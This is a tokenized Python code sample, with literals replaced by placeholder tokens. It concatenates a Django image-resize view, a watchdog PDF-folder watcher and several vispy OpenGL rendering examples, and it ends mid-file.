IMAGEFIT_CACHE_ENABLED : <EOL> image . cache = cache <EOL> image . cached_name = request . META . get ( '<STR_LIT>' ) <EOL> if image . is_cached : <EOL> return _image_response ( image ) <EOL> preset = Presets . get ( format ) or Presets . from_string ( format ) <EOL> if not preset : <EOL> raise ImproperlyConfigured ( <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" % format <EOL> ) <EOL> if preset . get ( '<STR_LIT>' ) : <EOL> image . crop ( preset . get ( '<STR_LIT:width>' ) , preset . get ( '<STR_LIT>' ) ) <EOL> else : <EOL> image . resize ( preset . get ( '<STR_LIT:width>' ) , preset . get ( '<STR_LIT>' ) ) <EOL> image . save ( ) <EOL> return _image_response ( image ) </s>
<s> """<STR_LIT>""" <EOL> import sys , os <EOL> import re <EOL> import logging <EOL> import shutil <EOL> import time <EOL> import glob <EOL> from threading import Lock <EOL> from watchdog . observers import Observer <EOL> from watchdog . events import LoggingEventHandler <EOL> from watchdog . events import FileSystemEventHandler <EOL> class PyPdfWatcher ( FileSystemEventHandler ) : <EOL> """<STR_LIT>""" <EOL> events = { } <EOL> events_lock = Lock ( ) <EOL> def __init__ ( self , monitor_dir , config ) : <EOL> FileSystemEventHandler . __init__ ( self ) <EOL> self . monitor_dir = monitor_dir <EOL> if not config : config = { } <EOL> self . scan_interval = config . get ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> def start ( self ) : <EOL> self . observer = Observer ( ) <EOL> self . observer . schedule ( self , self . monitor_dir ) <EOL> self . observer . start ( ) <EOL> print ( "<STR_LIT>" % ( self . monitor_dir ) ) <EOL> while True : <EOL> logging . info ( "<STR_LIT>" % self . scan_interval ) <EOL> time . sleep ( self . scan_interval ) <EOL> newFile = self . check_queue ( ) <EOL> if newFile : <EOL> yield newFile <EOL> self . observer . join ( ) <EOL> def stop ( self ) : <EOL> self . observer . stop ( ) <EOL> def rename_file_with_spaces ( self , pdf_filename ) : <EOL> """<STR_LIT>""" <EOL> filepath , filename = os . path . split ( pdf_filename ) <EOL> if '<STR_LIT:U+0020>' in filename : <EOL> newFilename = os . path . join ( filepath , filename . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> logging . debug ( "<STR_LIT>" % ( pdf_filename , newFilename ) ) <EOL> shutil . move ( pdf_filename , newFilename ) <EOL> return newFilename <EOL> else : <EOL> return pdf_filename <EOL> def check_for_new_pdf ( self , ev_path ) : <EOL> """<STR_LIT>""" <EOL> if ev_path . endswith ( "<STR_LIT>" ) : <EOL> if not ev_path . endswith ( "<STR_LIT>" ) : <EOL> PyPdfWatcher . events_lock . acquire ( ) <EOL> if not ev_path in PyPdfWatcher . events : <EOL> PyPdfWatcher . events [ ev_path ] = time . time ( ) <EOL> logging . info ( "<STR_LIT>" % ev_path ) <EOL> else : <EOL> if PyPdfWatcher . events [ ev_path ] == - <NUM_LIT:1> : <EOL> logging . info ( "<STR_LIT>" % ( ev_path ) ) <EOL> del PyPdfWatcher . events [ ev_path ] <EOL> else : <EOL> newTime = time . time ( ) <EOL> logging . debug ( "<STR_LIT>" % ( ev_path , newTime ) ) <EOL> PyPdfWatcher . events [ ev_path ] = newTime <EOL> PyPdfWatcher . events_lock . release ( ) <EOL> def on_created ( self , event ) : <EOL> logging . debug ( "<STR_LIT>" % ( event . src_path , time . time ( ) ) ) <EOL> self . check_for_new_pdf ( event . src_path ) <EOL> def on_moved ( self , event ) : <EOL> logging . debug ( "<STR_LIT>" % event . src_path ) <EOL> self . check_for_new_pdf ( event . dest_path ) <EOL> def on_modified ( self , event ) : <EOL> logging . debug ( "<STR_LIT>" % event . src_path ) <EOL> self . check_for_new_pdf ( event . src_path ) <EOL> def check_queue ( self ) : <EOL> """<STR_LIT>""" <EOL> now = time . time ( ) <EOL> PyPdfWatcher . events_lock . acquire ( ) <EOL> for monitored_file , timestamp in PyPdfWatcher . events . items ( ) : <EOL> if timestamp == - <NUM_LIT:1> : <EOL> del PyPdfWatcher . events [ monitored_file ] <EOL> elif now - timestamp > self . scan_interval : <EOL> logging . info ( "<STR_LIT>" % ( monitored_file ) ) <EOL> del PyPdfWatcher . events [ monitored_file ] <EOL> monitored_file = self . rename_file_with_spaces ( monitored_file ) <EOL> PyPdfWatcher . events [ monitored_file ] = - <NUM_LIT:1> <EOL> PyPdfWatcher . events_lock . release ( ) <EOL> return monitored_file <EOL> PyPdfWatcher . events_lock . release ( ) <EOL> return None </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from vispy . io import load_spatial_filters <EOL> from vispy import gloo <EOL> from vispy import app <EOL> I = np . zeros ( <NUM_LIT> ) . reshape ( ( <NUM_LIT:5> , <NUM_LIT:5> ) ) . astype ( np . float32 ) <EOL> I [ <NUM_LIT:1> : <NUM_LIT:4> , <NUM_LIT:1> : : <NUM_LIT:2> ] = <NUM_LIT:0.5> <EOL> I [ <NUM_LIT:1> : : <NUM_LIT:2> , <NUM_LIT:2> ] = <NUM_LIT:0.5> <EOL> I [ <NUM_LIT:2> , <NUM_LIT:2> ] = <NUM_LIT:1.0> <EOL> kernel , names = load_spatial_filters ( ) <EOL> data = np . zeros ( <NUM_LIT:4> , dtype = [ ( '<STR_LIT>' , np . float32 , <NUM_LIT:2> ) , <EOL> ( '<STR_LIT>' , np . float32 , <NUM_LIT:2> ) ] ) <EOL> data [ '<STR_LIT>' ] = np . array ( [ [ - <NUM_LIT:1> , - <NUM_LIT:1> ] , [ + <NUM_LIT:1> , - <NUM_LIT:1> ] , [ - <NUM_LIT:1> , + <NUM_LIT:1> ] , [ + <NUM_LIT:1> , + <NUM_LIT:1> ] ] ) <EOL> data [ '<STR_LIT>' ] = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ] ) <EOL> VERT_SHADER = """<STR_LIT>""" <EOL> FRAG_SHADER = """<STR_LIT>""" <EOL> class Canvas ( app . Canvas ) : <EOL> def __init__ ( self ) : <EOL> app . Canvas . __init__ ( self , keys = '<STR_LIT>' , size = ( ( <NUM_LIT> ) , ( <NUM_LIT> ) ) ) <EOL> self . program = gloo . Program ( VERT_SHADER , FRAG_SHADER % '<STR_LIT>' ) <EOL> self . texture = gloo . Texture2D ( I , interpolation = '<STR_LIT>' ) <EOL> self . kernel = gloo . Texture2D ( kernel , interpolation = '<STR_LIT>' ) <EOL> self . program [ '<STR_LIT>' ] = self . texture <EOL> self . names = names <EOL> self . filter = <NUM_LIT:16> <EOL> self . title = '<STR_LIT>' % self . names [ self . filter ] <EOL> self . program . bind ( gloo . VertexBuffer ( data ) ) <EOL> self . context . set_clear_color ( '<STR_LIT>' ) <EOL> self . context . set_viewport ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ) <EOL> self . show ( ) <EOL> def on_key_press ( self , event ) : <EOL> if event . key in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if event . key == '<STR_LIT>' : <EOL> step = <NUM_LIT:1> <EOL> else : <EOL> step = - <NUM_LIT:1> <EOL> self . filter = ( self . filter + step ) % <NUM_LIT> <EOL> self . program . set_shaders ( VERT_SHADER , <EOL> FRAG_SHADER % self . names [ self . filter ] ) <EOL> if self . names [ self . filter ] != '<STR_LIT>' : <EOL> self . program [ '<STR_LIT>' ] = self . kernel <EOL> self . program [ '<STR_LIT>' ] = I . shape [ <NUM_LIT:1> ] , I . shape [ <NUM_LIT:0> ] <EOL> self . title = '<STR_LIT>' % self . names [ self . filter ] <EOL> self . update ( ) <EOL> def on_resize ( self , event ) : <EOL> self . context . set_viewport ( <NUM_LIT:0> , <NUM_LIT:0> , * event . physical_size ) <EOL> def on_draw ( self , event ) : <EOL> self . context . clear ( color = True , depth = True ) <EOL> self . program . draw ( '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> c = Canvas ( ) <EOL> app . run ( ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from vispy import app , scene , visuals <EOL> from vispy . util . filter import gaussian_filter <EOL> import numpy as np <EOL> canvas = scene . SceneCanvas ( keys = '<STR_LIT>' , title = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> canvas . size = <NUM_LIT> , <NUM_LIT> <EOL> canvas . show ( ) <EOL> view = canvas . central_widget . add_view ( ) <EOL> img_data = np . empty ( ( <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:3> ) , dtype = np . ubyte ) <EOL> noise = np . random . normal ( size = ( <NUM_LIT:100> , <NUM_LIT:100> ) , loc = <NUM_LIT:50> , scale = <NUM_LIT> ) <EOL> noise = gaussian_filter ( noise , ( <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:0> ) ) <EOL> img_data [ : ] = noise [ ... , np . newaxis ] <EOL> image = scene . visuals . Image ( img_data , parent = view . scene ) <EOL> image . transform = visuals . transforms . STTransform ( translate = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0.5> ) ) <EOL> levels = [ <NUM_LIT> , <NUM_LIT:50> , <NUM_LIT> ] <EOL> color_lev = [ ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) ] <EOL> curve = scene . visuals . Isocurve ( noise , levels = levels , color_lev = color_lev , <EOL> parent = view . scene ) <EOL> view . camera = scene . PanZoomCamera ( aspect = <NUM_LIT:1> ) <EOL> view . camera . set_range ( ) <EOL> if __name__ == '<STR_LIT:__main__>' and sys . flags . interactive == <NUM_LIT:0> : <EOL> app . run ( ) </s>
<s> """<STR_LIT>""" <EOL> from vispy import app , gloo , visuals <EOL> from vispy . geometry import create_box <EOL> from vispy . visuals . transforms import MatrixTransform <EOL> class Canvas ( app . Canvas ) : <EOL> def __init__ ( self ) : <EOL> app . Canvas . __init__ ( self , keys = '<STR_LIT>' , size = ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> vertices , faces , outline = create_box ( width = <NUM_LIT:1> , height = <NUM_LIT:1> , depth = <NUM_LIT:1> , <EOL> width_segments = <NUM_LIT:4> , <EOL> height_segments = <NUM_LIT:8> , <EOL> depth_segments = <NUM_LIT:16> ) <EOL> self . box = visuals . BoxVisual ( width = <NUM_LIT:1> , height = <NUM_LIT:1> , depth = <NUM_LIT:1> , <EOL> width_segments = <NUM_LIT:4> , <EOL> height_segments = <NUM_LIT:8> , <EOL> depth_segments = <NUM_LIT:16> , <EOL> vertex_colors = vertices [ '<STR_LIT>' ] , <EOL> edge_color = '<STR_LIT:b>' ) <EOL> self . theta = <NUM_LIT:0> <EOL> self . phi = <NUM_LIT:0> <EOL> self . transform = MatrixTransform ( ) <EOL> self . box . transform = self . transform <EOL> self . show ( ) <EOL> self . timer = app . Timer ( connect = self . rotate ) <EOL> self . timer . start ( <NUM_LIT> ) <EOL> def rotate ( self , event ) : <EOL> self . theta += <NUM_LIT> <EOL> self . phi += <NUM_LIT> <EOL> self . transform . reset ( ) <EOL> self . transform . rotate ( self . theta , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> self . transform . rotate ( self . phi , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) ) <EOL> self . transform . scale ( ( <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT> ) ) <EOL> self . transform . translate ( ( <NUM_LIT:200> , <NUM_LIT:200> ) ) <EOL> self . update ( ) <EOL> def on_resize ( self , event ) : <EOL> vp = ( <NUM_LIT:0> , <NUM_LIT:0> , self . physical_size [ <NUM_LIT:0> ] , self . physical_size [ <NUM_LIT:1> ] ) <EOL> self . context . set_viewport ( * vp ) <EOL> self . box . transforms . configure ( canvas = self , viewport = vp ) <EOL> def on_draw ( self , ev ) : <EOL> gloo . clear ( color = '<STR_LIT>' , depth = True ) <EOL> self . box . draw ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> win = Canvas ( ) <EOL> import sys <EOL> if sys . flags . interactive != <NUM_LIT:1> : <EOL> app . run ( ) </s>
<s> import json <EOL> import numpy as np <EOL> from vispy import app , gloo <EOL> from vispy . util import load_data_file <EOL> from vispy . visuals . collections import PathCollection , PolygonCollection <EOL> from vispy . visuals . transforms import PanZoomTransform <EOL> path = load_data_file ( '<STR_LIT>' ) <EOL> with open ( path , '<STR_LIT:r>' ) as f : <EOL> geo = json . load ( f ) <EOL> def unique_rows ( data ) : <EOL> v = data . view ( data . dtype . descr * data . shape [ <NUM_LIT:1> ] ) <EOL> _ , idx = np . unique ( v , return_index = True ) <EOL> return data [ np . sort ( idx ) ] <EOL> def add ( P , color ) : <EOL> P = np . array ( P ) <EOL> if len ( P ) < <NUM_LIT:2> : <EOL> return <EOL> P = np . array ( P ) / <NUM_LIT> + ( <NUM_LIT:5> , - <NUM_LIT:2> ) <EOL> p = np . zeros ( ( len ( P ) , <NUM_LIT:3> ) ) <EOL> p [ : , : <NUM_LIT:2> ] = P <EOL> p = unique_rows ( p ) <EOL> if len ( p ) > <NUM_LIT:1> : <EOL> paths . append ( p , closed = True ) <EOL> if len ( p ) > <NUM_LIT:2> : <EOL> polys . append ( p , color = color ) <EOL> canvas = app . Canvas ( size = ( <NUM_LIT> , <NUM_LIT> ) , keys = '<STR_LIT>' ) <EOL> gloo . set_viewport ( <NUM_LIT:0> , <NUM_LIT:0> , canvas . size [ <NUM_LIT:0> ] , canvas . size [ <NUM_LIT:1> ] ) <EOL> gloo . set_state ( "<STR_LIT>" , depth_test = False ) <EOL> panzoom = PanZoomTransform ( canvas , aspect = <NUM_LIT:1> ) <EOL> paths = PathCollection ( mode = "<STR_LIT>" , color = "<STR_LIT>" , transform = panzoom ) <EOL> polys = PolygonCollection ( "<STR_LIT>" , color = "<STR_LIT>" , transform = panzoom ) <EOL> paths . update . connect ( canvas . update ) <EOL> for feature in geo [ "<STR_LIT>" ] : <EOL> if feature [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] == '<STR_LIT>' : <EOL> path = feature [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> rgba = np . random . uniform ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:4> ) <EOL> rgba [ <NUM_LIT:3> ] = <NUM_LIT:1> <EOL> add ( path [ <NUM_LIT:0> ] , color = rgba ) <EOL> elif feature [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] == '<STR_LIT>' : <EOL> coordinates = feature [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> for path in coordinates : <EOL> rgba = np . random . uniform ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:4> ) <EOL> rgba [ <NUM_LIT:3> ] = <NUM_LIT:1> <EOL> add ( path [ <NUM_LIT:0> ] , color = rgba ) <EOL> paths [ "<STR_LIT>" ] = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> <EOL> paths [ "<STR_LIT>" ] = <NUM_LIT:1.0> <EOL> paths [ '<STR_LIT>' ] = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> <EOL> @ canvas . connect <EOL> def on_draw ( e ) : <EOL> gloo . clear ( '<STR_LIT>' ) <EOL> polys . draw ( ) <EOL> paths . draw ( ) <EOL> @ canvas . connect <EOL> def on_resize ( event ) : <EOL> width , height = event . size <EOL> gloo . set_viewport ( <NUM_LIT:0> , <NUM_LIT:0> , width , height ) <EOL> paths [ '<STR_LIT>' ] = <NUM_LIT:0> , <NUM_LIT:0> , width , height <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> canvas . show ( ) <EOL> app . run ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import numpy as np <EOL> from vispy import app , gloo <EOL> vertex = """<STR_LIT>""" <EOL> fragment = """<STR_LIT>""" <EOL> class Canvas ( app . Canvas ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> app . Canvas . __init__ ( self , * args , ** kwargs ) <EOL> self . program = gloo . Program ( vertex , fragment ) <EOL> self . program [ "<STR_LIT>" ] = [ ( - <NUM_LIT:1> , - <NUM_LIT:1> ) , ( - <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> ( - <NUM_LIT:1> , - <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , - <NUM_LIT:1> ) ] <EOL> self . scale = <NUM_LIT:3> <EOL> self . program [ "<STR_LIT>" ] = set_emulated_double ( self . scale ) <EOL> self . center = [ - <NUM_LIT:0.5> , <NUM_LIT:0> ] <EOL> self . bounds = [ - <NUM_LIT:2> , <NUM_LIT:2> ] <EOL> self . translate_center ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . iterations = self . program [ "<STR_LIT>" ] = <NUM_LIT> <EOL> self . apply_zoom ( ) <EOL> self . min_scale = <NUM_LIT> <EOL> self . max_scale = <NUM_LIT:4> <EOL> gloo . set_clear_color ( color = '<STR_LIT>' ) <EOL> self . show ( ) <EOL> def on_draw ( self , event ) : <EOL> self . program . draw ( ) <EOL> def on_resize ( self , event ) : <EOL> self . apply_zoom ( ) <EOL> def apply_zoom ( self ) : <EOL> width , height = self . physical_size <EOL> gloo . set_viewport ( <NUM_LIT:0> , <NUM_LIT:0> , width , height ) <EOL> self . program [ '<STR_LIT>' ] = set_emulated_double ( <NUM_LIT:1> / width ) <EOL> self . program [ '<STR_LIT>' ] = set_emulated_double ( <NUM_LIT:1> / height ) <EOL> def on_mouse_move ( self , event ) : <EOL> """<STR_LIT>""" <EOL> if event . is_dragging and event . buttons [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> x0 , y0 = event . last_event . pos [ <NUM_LIT:0> ] , event . last_event . pos [ <NUM_LIT:1> ] <EOL> x1 , y1 = event . pos [ <NUM_LIT:0> ] , event . pos [ <NUM_LIT:1> ] <EOL> X0 , Y0 = self . pixel_to_coords ( float ( x0 ) , float ( y0 ) ) <EOL> X1 , Y1 = self . pixel_to_coords ( float ( x1 ) , float ( y1 ) ) <EOL> self . translate_center ( X1 - X0 , Y1 - Y0 ) <EOL> self . update ( ) <EOL> def translate_center ( self , dx , dy ) : <EOL> """<STR_LIT>""" <EOL> center = self . center <EOL> center [ <NUM_LIT:0> ] -= dx <EOL> center [ <NUM_LIT:1> ] -= dy <EOL> center [ <NUM_LIT:0> ] = min ( max ( center [ <NUM_LIT:0> ] , self . bounds [ <NUM_LIT:0> ] ) , self . bounds [ <NUM_LIT:1> ] ) <EOL> center [ <NUM_LIT:1> ] = min ( max ( center [ <NUM_LIT:1> ] , self . bounds [ <NUM_LIT:0> ] ) , self . bounds [ <NUM_LIT:1> ] ) <EOL> self . center = center <EOL> center_x = set_emulated_double ( center [ <NUM_LIT:0> ] ) <EOL> center_y = set_emulated_double ( center [ <NUM_LIT:1> ] ) <EOL> self . program [ "<STR_LIT>" ] = center_x <EOL> self . program [ "<STR_LIT>" ] = center_y <EOL> def pixel_to_coords ( self , x , y ) : <EOL> """<STR_LIT>""" <EOL> rx , ry = self . size <EOL> nx = ( x / rx - <NUM_LIT:0.5> ) * self . scale + self . center [ <NUM_LIT:0> ] <EOL> ny = ( ( ry - y ) / ry - <NUM_LIT:0.5> ) * self . scale + self . center [ <NUM_LIT:1> ] <EOL> return [ nx , ny ] <EOL> def on_mouse_wheel ( self , event ) : <EOL> """<STR_LIT>""" <EOL> delta = event . delta [ <NUM_LIT:1> ] <EOL> if delta > <NUM_LIT:0> : <EOL> factor = <NUM_LIT> <EOL> elif delta < <NUM_LIT:0> : <EOL> factor = <NUM_LIT:1> / <NUM_LIT> <EOL> for _ in range ( int ( abs ( delta ) ) ) : <EOL> self . zoom ( factor , event . pos ) <EOL> self . update ( ) <EOL> def on_key_press ( self , event ) : <EOL> """<STR_LIT>""" <EOL> if event . text == '<STR_LIT:+>' or event . text == '<STR_LIT:=>' : <EOL> self . zoom ( <NUM_LIT> ) <EOL> elif event . text == '<STR_LIT:->' : <EOL> self . zoom ( <NUM_LIT:1> / <NUM_LIT> ) <EOL> self . update ( ) <EOL> def zoom ( self , factor , mouse_coords = None ) : <EOL> """<STR_LIT>""" <EOL> if mouse_coords is not None : <EOL> x , y = float ( mouse_coords [ <NUM_LIT:0> ] ) , float ( mouse_coords [ <NUM_LIT:1> ] ) <EOL> x0 , y0 = self . pixel_to_coords ( x , y ) <EOL> self . scale *= factor <EOL> self . scale = max ( min ( self . scale , self . max_scale ) , self . min_scale ) <EOL> self . program [ "<STR_LIT>" ] = set_emulated_double ( self . scale ) <EOL> if mouse_coords is not None : <EOL> x1 , y1 = self . pixel_to_coords ( x , y ) <EOL> self . translate_center ( x1 - x0 , y1 - y0 ) <EOL> def set_emulated_double ( number ) : <EOL> """<STR_LIT>""" <EOL> double = np . array ( [ number , <NUM_LIT:0> ] , dtype = np . float32 ) <EOL> double [ <NUM_LIT:1> ] = number - double [ <NUM_LIT:0> ] <EOL> return double <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> canvas = Canvas ( size = ( <NUM_LIT> , <NUM_LIT> ) , keys = '<STR_LIT>' ) <EOL> app . run ( ) </s>
<s> import math <EOL> import numpy as np <EOL> from vispy import app <EOL> from vispy . gloo import gl <EOL> def checkerboard ( grid_num = <NUM_LIT:8> , grid_size = <NUM_LIT:32> ) : <EOL> row_even = grid_num // <NUM_LIT:2> * [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> row_odd = grid_num // <NUM_LIT:2> * [ <NUM_LIT:1> , <NUM_LIT:0> ] <EOL> Z = np . row_stack ( grid_num // <NUM_LIT:2> * ( row_even , row_odd ) ) . astype ( np . uint8 ) <EOL> return <NUM_LIT:255> * Z . repeat ( grid_size , axis = <NUM_LIT:0> ) . repeat ( grid_size , axis = <NUM_LIT:1> ) <EOL> def rotate ( M , angle , x , y , z , point = None ) : <EOL> angle = math . pi * angle / <NUM_LIT> <EOL> c , s = math . cos ( angle ) , math . sin ( angle ) <EOL> n = math . sqrt ( x * x + y * y + z * z ) <EOL> x /= n <EOL> y /= n <EOL> z /= n <EOL> cx , cy , cz = ( <NUM_LIT:1> - c ) * x , ( <NUM_LIT:1> - c ) * y , ( <NUM_LIT:1> - c ) * z <EOL> R = np . array ( [ [ cx * x + c , cy * x - z * s , cz * x + y * s , <NUM_LIT:0> ] , <EOL> [ cx * y + z * s , cy * y + c , cz * y - x * s , <NUM_LIT:0> ] , <EOL> [ cx * z - y * s , cy * z + x * s , cz * z + c , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] ] , dtype = M . dtype ) . T <EOL> M [ ... ] = np . dot ( M , R ) <EOL> return M <EOL> def translate ( M , x , y = None , z = None ) : <EOL> y = x if y is None else y <EOL> z = x if z is None else z <EOL> T = np . array ( [ [ <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , x ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:0.0> , y ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> , z ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ] ] , dtype = M . dtype ) . T <EOL> M [ ... ] = np . dot ( M , T ) <EOL> return M <EOL> def frustum ( left , right , bottom , top , znear , zfar ) : <EOL> M = np . zeros ( ( <NUM_LIT:4> , <NUM_LIT:4> ) , dtype = np . float32 ) <EOL> M [ <NUM_LIT:0> , <NUM_LIT:0> ] = + <NUM_LIT> * znear / ( right - left ) <EOL> M [ <NUM_LIT:2> , <NUM_LIT:0> ] = ( right + left ) / ( right - left ) <EOL> M [ <NUM_LIT:1> , <NUM_LIT:1> ] = + <NUM_LIT> * znear / ( top - bottom ) <EOL> M [ <NUM_LIT:3> , <NUM_LIT:1> ] = ( top + bottom ) / ( top - bottom ) <EOL> M [ <NUM_LIT:2> , <NUM_LIT:2> ] = - ( zfar + znear ) / ( zfar - znear ) <EOL> M [ <NUM_LIT:3> , <NUM_LIT:2> ] = - <NUM_LIT> * znear * zfar / ( zfar - znear ) <EOL> M [ <NUM_LIT:2> , <NUM_LIT:3> ] = - <NUM_LIT:1.0> <EOL> return M <EOL> def perspective ( fovy , aspect , znear , zfar ) : <EOL> h = math . tan ( fovy / <NUM_LIT> * math . pi ) * znear <EOL> w = h * aspect <EOL> return frustum ( - w , w , - h , h , znear , zfar ) <EOL> def makecube ( ) : <EOL> """<STR_LIT>""" <EOL> vtype = [ ( '<STR_LIT>' , np . float32 , <NUM_LIT:3> ) , <EOL> ( '<STR_LIT>' , np . float32 , <NUM_LIT:2> ) ] <EOL> itype = np . uint32 <EOL> p = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] , [ - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] , [ - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:1> , - <NUM_LIT:1> ] , [ - <NUM_LIT:1> , <NUM_LIT:1> , - <NUM_LIT:1> ] , [ - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ] ] ) <EOL> t = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ] ) <EOL> faces_p = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:6> , <EOL> <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:6> , <NUM_LIT:5> ] <EOL> faces_t = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <EOL> <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> vertices = np . zeros ( <NUM_LIT> , vtype ) <EOL> vertices [ '<STR_LIT>' ] = p [ faces_p ] <EOL> vertices [ '<STR_LIT>' ] = t [ faces_t ] <EOL> indices = np . resize ( <EOL> np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> ] , dtype = itype ) , <NUM_LIT:6> * ( <NUM_LIT:2> * <NUM_LIT:3> ) ) <EOL> indices += np . repeat ( <NUM_LIT:4> * np . arange ( <NUM_LIT:6> ) , <NUM_LIT:6> ) . astype ( np . uint32 ) <EOL> return vertices , indices <EOL> cube_vertex = """<STR_LIT>""" <EOL> cube_fragment = """<STR_LIT>""" <EOL> class Canvas ( app . Canvas ) : <EOL> def __init__ ( self ) : <EOL> app . Canvas . __init__ ( self , size = ( <NUM_LIT> , <NUM_LIT> ) , <EOL> title = '<STR_LIT>' , <EOL> keys = '<STR_LIT>' ) <EOL> def on_initialize ( self , event ) : <EOL> self . cube = gl . glCreateProgram ( ) <EOL> vertex = gl . glCreateShader ( gl . GL_VERTEX_SHADER ) <EOL> fragment = gl . glCreateShader ( gl . GL_FRAGMENT_SHADER ) <EOL> gl . glShaderSource ( vertex , cube_vertex ) <EOL> gl . glShaderSource ( fragment , cube_fragment ) <EOL> gl . glCompileShader ( vertex ) <EOL> gl . glCompileShader ( fragment ) <EOL> gl . glAttachShader ( self . cube , vertex ) <EOL> gl . glAttachShader ( self . cube , fragment ) <EOL> gl . glLinkProgram ( self . cube ) <EOL> gl . glDetachShader ( self . cube , vertex ) <EOL> gl . glDetachShader ( self . cube , fragment ) <EOL> gl . glUseProgram ( self . cube ) <EOL> vcube_data , self . icube_data = makecube ( ) <EOL> vcube = gl . glCreateBuffer ( ) <EOL> gl . glBindBuffer ( gl . GL_ARRAY_BUFFER , vcube ) <EOL> gl . glBufferData ( gl . GL_ARRAY_BUFFER , vcube_data , gl . GL_STATIC_DRAW ) <EOL> icube = gl . glCreateBuffer ( ) <EOL> gl . glBindBuffer ( gl . GL_ELEMENT_ARRAY_BUFFER , icube ) <EOL> gl . glBufferData ( gl . GL_ELEMENT_ARRAY_BUFFER , <EOL> self . icube_data , gl . GL_STATIC_DRAW ) <EOL> stride = vcube_data . strides [ <NUM_LIT:0> ] <EOL> offset = <NUM_LIT:0> <EOL> loc = gl . glGetAttribLocation ( self . cube , 